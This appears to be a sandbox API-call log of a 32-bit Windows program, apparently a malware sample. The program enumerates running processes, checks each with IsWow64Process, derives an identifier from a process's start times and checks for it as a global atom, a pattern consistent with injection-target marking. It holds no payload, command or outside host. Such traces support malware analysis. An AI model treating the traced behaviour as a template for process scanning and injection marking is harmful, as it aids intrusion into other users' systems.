	[0127.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.483] CloseHandle (hObject=0x2dc) returned 1
	[0127.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.484] CloseHandle (hObject=0x2dc) returned 1
	[0127.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.484] CloseHandle (hObject=0x2dc) returned 1
	[0127.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.484] CloseHandle (hObject=0x2dc) returned 1
	[0127.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.485] CloseHandle (hObject=0x2dc) returned 1
	[0127.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.485] CloseHandle (hObject=0x2dc) returned 1
	[0127.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.486] CloseHandle (hObject=0x2dc) returned 1
	[0127.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.486] CloseHandle (hObject=0x2dc) returned 1
	[0127.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.487] CloseHandle (hObject=0x2dc) returned 1
	[0127.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.487] CloseHandle (hObject=0x2dc) returned 1
	[0127.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.487] CloseHandle (hObject=0x2dc) returned 1
	[0127.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.488] CloseHandle (hObject=0x2dc) returned 1
	[0127.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.488] CloseHandle (hObject=0x2dc) returned 1
	[0127.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.489] CloseHandle (hObject=0x2dc) returned 1
	[0127.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.489] CloseHandle (hObject=0x2dc) returned 1
	[0127.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.489] CloseHandle (hObject=0x2dc) returned 1
	[0127.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.490] CloseHandle (hObject=0x2dc) returned 1
	[0127.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.490] CloseHandle (hObject=0x2dc) returned 1
	[0127.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.491] CloseHandle (hObject=0x2dc) returned 1
	[0127.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.491] CloseHandle (hObject=0x2dc) returned 1
	[0127.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.491] CloseHandle (hObject=0x2dc) returned 1
	[0127.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.492] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.492] CloseHandle (hObject=0x2dc) returned 1
	[0127.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.492] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.492] CloseHandle (hObject=0x2dc) returned 1
	[0127.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.493] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.493] CloseHandle (hObject=0x2dc) returned 1
	[0127.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.493] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.493] CloseHandle (hObject=0x2dc) returned 1
	[0127.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.493] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.493] CloseHandle (hObject=0x2dc) returned 1
	[0127.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.494] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.494] CloseHandle (hObject=0x2dc) returned 1
	[0127.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.494] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.494] CloseHandle (hObject=0x2dc) returned 1
	[0127.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.495] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.495] CloseHandle (hObject=0x2dc) returned 1
	[0127.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.495] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetLastError () returned 0x5
	[0127.496] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.496] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.496] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] GetLastError () returned 0x5
	[0127.497] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.497] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.498] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetLastError () returned 0x5
	[0127.499] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.499] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.500] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.500] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.500] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.500] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.500] CloseHandle (hObject=0x2dc) returned 1
	[0127.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.500] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.501] CloseHandle (hObject=0x2dc) returned 1
	[0127.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.501] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.501] CloseHandle (hObject=0x2dc) returned 1
	[0127.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.501] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.501] CloseHandle (hObject=0x2dc) returned 1
	[0127.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.502] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.502] CloseHandle (hObject=0x2dc) returned 1
	[0127.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.502] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.502] CloseHandle (hObject=0x2dc) returned 1
	[0127.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.535] VirtualAlloc (lpAddress=0x0, dwSize=0x16dd8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0127.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16dd8, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0127.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0127.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0127.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0127.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0127.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0127.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0127.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
